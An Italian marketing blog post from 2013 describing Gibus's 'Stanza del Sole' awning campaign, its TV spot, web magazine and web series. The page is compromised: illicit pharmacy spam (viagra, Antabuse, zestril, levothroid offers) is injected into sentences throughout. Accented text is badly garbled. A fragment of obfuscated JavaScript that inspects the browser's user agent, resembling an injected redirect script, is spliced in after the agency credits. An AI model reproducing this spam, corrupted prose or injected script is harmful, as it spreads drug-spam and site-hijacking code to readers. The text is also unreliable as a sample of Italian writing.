Campagna Integrata 2013 Gibus: la Stanza del Sole

CONDIVIDI SUI SOCIAL

6 maggio 2013 | TPblog

Campagna Integrata 2013 Gibus: la Stanza del Sole

Gibus, azienda leader nella realizzazione di tende da sole, presenta la cheap pills viagra without prescription nuova Campagna Integrata 2013 Pills , un inedito ed innovativo progetto di comunicazione che sfrutta tutti i principali canali mediatici.

L’obiettivo dell’azienda A? comunicare al proprio pubblico la qualitAi?? dei prodotti e la vasta gamma di modelli attraverso un linguaggio nuovo e, allo stesso tempo, far conoscere ed elevare il brand.

Diversi fattori hanno contribuito al successo del marchio Cheap Gibus: la continua ricerca di nuovi materiali che possano garantire stabilitAi?? e tenuta nelle diverse condizioni atmosferiche, ha portato allo sviluppo di prodotti sicuri e di qualitAi??;Ai??la vasta gamma di articoli, che conta ventuno linee, oltre cento modelli e la possibilitAi?? di personalizzare la propria tenda da sole scegliendo tra 600 tessuti diversi, permette infinite soluzioni, tutte adattabili perfettamente alle diverse condizioni abitative; il design raffinato e innovativo dei nuovi modelli consente di intercettare anche il pubblico piA? esigente e soddisfare le richieste ai???esteticheai??? di architetti, interior designer e garden designer.

Grazie alla gamma di prodotti Gibus skelaxin costochondritis Purchase spazi poco valorizzati o per nulla utilizzati diventano delle vere e proprie stanze da vivere per molti mesi l’anno, protette dal caldo e dalla pioggia: ambienti in grado di trasmettere i profumi e i colori dell’estate, la gioia e l’energia del sole, trasformano lo spazio in un luogo speciale in cui ritrovare le emozioni piA? semplici e il piacere di godere del tempo all’aria aperta.

La Stanza del Sole A? diventato cosAi?? il concetto su cui costruire la comunicazione integrata del brand e dei suoi prodotti; un modo alternativo di presentare le tende da sole e i sistemi di protezione solare senza dover per forza parlare di ombra.

Immaginare lo spazio racchiuso da una tenda come un luogo in cui assaporare il piacere del tempo trascorso all’aria aperta, dei semplici ma sempre piA? rari momenti di vita quotidiana, ha fornito gli spunti per individuare uno stile rappresentativo e un modello in cui chiunque si possa riconoscere.

E la Pills Cheap Antabuse reviews Campagna Gibus 2013 parla proprio di questo: di convivialitAi??, di allegria, di persone autentiche, valori comunicati sia nella campagna stampa che nel nuovo spot TV.

Pills buy zestril online no prescription

Cresce anche l’impatto emotivo: il messaggio de La Stanza del Sole fa leva su un piA? ampio spettro di sensazioni per suggerire il benessere di chi vive i propri spazi all’aperto.

Nasce cosAi?? l’esigenza di esprimere un mondo di contenuti trasversali per dare ancora piA? forza ai concetti di sole, mediterraneitAi??, comfort e convivialitAi?? giAi?? proposti dalla precedente Campagna 2012 e un’idea: si possono trasferire le emozioni per evocare la realtAi?? dei prodotti Gibus?

Proprio da queste riflessioni prende il via la stanza del sole, web magazine di Gibus e punto di riferimento per tutti coloro che amano la vita all’aria aperta. Qui il pubblico puA? tenersi aggiornato sulle ultime novitAi?? in ambito di cucina, musica, arredamento, giochi e su tutto ciA? che riguarda il mondo di Gibus. Ogni settimana vengono pubblicati articoli da leggere, commentare e condividere sui principali social; ogni 15 giorni su lastanzadelsole.it vengono messi on-line gli episodi di ai???Passioni d’estateai??? l’altra grande novitAi?? legata al web magazine Gibus.

Serie web in sei episodi, unica ed inedita per il settore delle tende da sole, Passioni d’estate online A? una produzione video caratterizzata da unai??i??attitudine solare e gioiosa: mediterranea. Dalla riscoperta dei luoghi piA? belli dai??i??Italia, la serie web prende gli scenari per ambientare le proprie storie in cui c’A? la presenza di un prodotto Gibus sempre diverso. Raccontiamo una quotidianitAi?? fatta di persone autentiche, dei loro sorrisi, del piacere della condivisione e del benessere che nasce dalle cose semplici.

In molti si riconosceranno, in scena cai??i??A? lai??i??Italia migliore.

VisitaAi??la stanza del sole!

( Order levothroid buy Agenzia creativa Santacroce DDC per l’ideazione della Campagna, per l’individuazione dei principali canali mediatici e per lo sviluppo degli strumenti di comunicazione Ai??- Agenzia Site by Site per la parte di web marketing, per il posizionamento della Campagna in rete e per la sua diffusione attraverso i motori di ricerca) [_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}





Newsletter

ASSOCIAZIONE TP TP Associazione Italiana Pubblicitari Professionisti
Via della Commenda n.41 - 20122 Milano, Italy
tel. 02 655841 - fax 02 48028247
www.associazione-tp.it tp@associazione-tp.it
P. IVA e C.F. 04694510159

Privacy - RSS Feed © 2014 TP WEB TEAM